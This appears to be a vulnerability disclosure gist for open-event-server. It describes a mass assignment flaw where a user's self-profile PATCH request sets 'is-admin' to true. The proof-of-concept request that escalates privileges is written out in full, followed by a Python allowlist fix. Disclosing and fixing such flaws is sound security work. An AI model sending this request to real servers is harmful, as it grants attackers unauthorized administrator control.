@superboy-zjc
Last active March 25, 2025 03:38
open-event-server is vulnerable to a mass assignment attack, leading to privilege escalation

Proof of Concept

Set is-admin to true in the PATCH request that updates your own profile.

PATCH /v1/users/[YOUR_ID] HTTP/1.1
Host: target
Authorization: JWT YOUR_TOKEN
Content-Type: application/vnd.api+json

{"data":{"id":"6","attributes":{"email":" superboyzjc+3@gmail.com ","is-verified":true,"is-blocked":false,"is-profile-public":false,"is-admin":**true**,
"is-super-admin": false,"is-user-owner":false,"is-user-organizer":true,"is-user-coorganizer":false,"is-user-track-organizer":false,"is-user-moderator":false,"is-user-registrar":false,"is-sales-admin":false,"is-marketer":false,"was-registered-with-order":false,"first-name":"t","last-name":"t","public-name":null,"details":"","contact":null,"avatar-url":null,"icon-image-url":null,"small-image-url":null,"thumbnail-image-url":null,"original-image-url":null,"facebook-url":null,"instagram-url":null,"twitter-url":null,"google-plus-url":null,"deleted-at":null,"billing-contact-name":null,"billing-phone":null,"billing-country":null,"company":null,"billing-address":null,"billing-city":null,"billing-zip-code":null,"billing-tax-info":null,"billing-additional-info":null,"billing-state":null},"type":"user"}}
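The fix for this class of bug is a server-side allowlist of the attributes a user may write on their own record, applied before the body reaches the model. The following is an added example written for this page, not open-event-server's own code; the JSON:API field names come from the request above, while the split into SELF_WRITABLE and PRIVILEGED, the function name and the fail-closed behaviour are assumptions for illustration.

```python
from typing import Any

# Attributes a user may change on their own profile (assumed subset).
SELF_WRITABLE = frozenset({
    "first-name", "last-name", "public-name", "details", "contact",
    "avatar-url", "facebook-url", "instagram-url", "twitter-url", "company",
    "billing-contact-name", "billing-phone", "billing-country",
    "billing-address", "billing-city", "billing-zip-code", "billing-state",
})

# Role and state flags that only privileged code paths may change.
PRIVILEGED = frozenset({
    "is-admin", "is-super-admin", "is-verified", "is-blocked",
    "is-sales-admin", "is-marketer", "is-user-owner", "is-user-organizer",
    "is-user-coorganizer", "is-user-track-organizer", "is-user-moderator",
    "is-user-registrar", "was-registered-with-order", "deleted-at",
})


class ForbiddenAttribute(ValueError):
    """A client tried to mass-assign a field it may not set."""


def filter_self_update(body: dict[str, Any], current: dict[str, Any],
                       actor_id: str) -> dict[str, Any]:
    """Return the attributes a non-admin user may persist from a PATCH body.

    `current` is the stored record, so a client that echoes back the whole
    object (as the request above does) is accepted as long as no privileged
    flag actually changes; an attempt to flip one raises instead of being
    silently dropped, so the attempt can be logged and alerted on.
    A flag absent from `current` counts as changed (fail closed).
    """
    data = body.get("data", {})
    if data.get("type") != "user":
        raise ValueError("unexpected resource type")
    if str(data.get("id")) != str(actor_id):
        raise ForbiddenAttribute("users may only PATCH their own record")
    attrs = data.get("attributes", {})
    changed = sorted(k for k in PRIVILEGED & attrs.keys()
                     if attrs[k] != current.get(k))
    if changed:
        raise ForbiddenAttribute(f"privileged attributes changed: {changed}")
    # Keys outside the allowlist (unknown or read-only) are dropped, never written.
    return {k: v for k, v in attrs.items() if k in SELF_WRITABLE}
```

The same check belongs on the admin side too: an administrator endpoint should use its own, wider allowlist rather than passing the raw attribute dict to the model.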
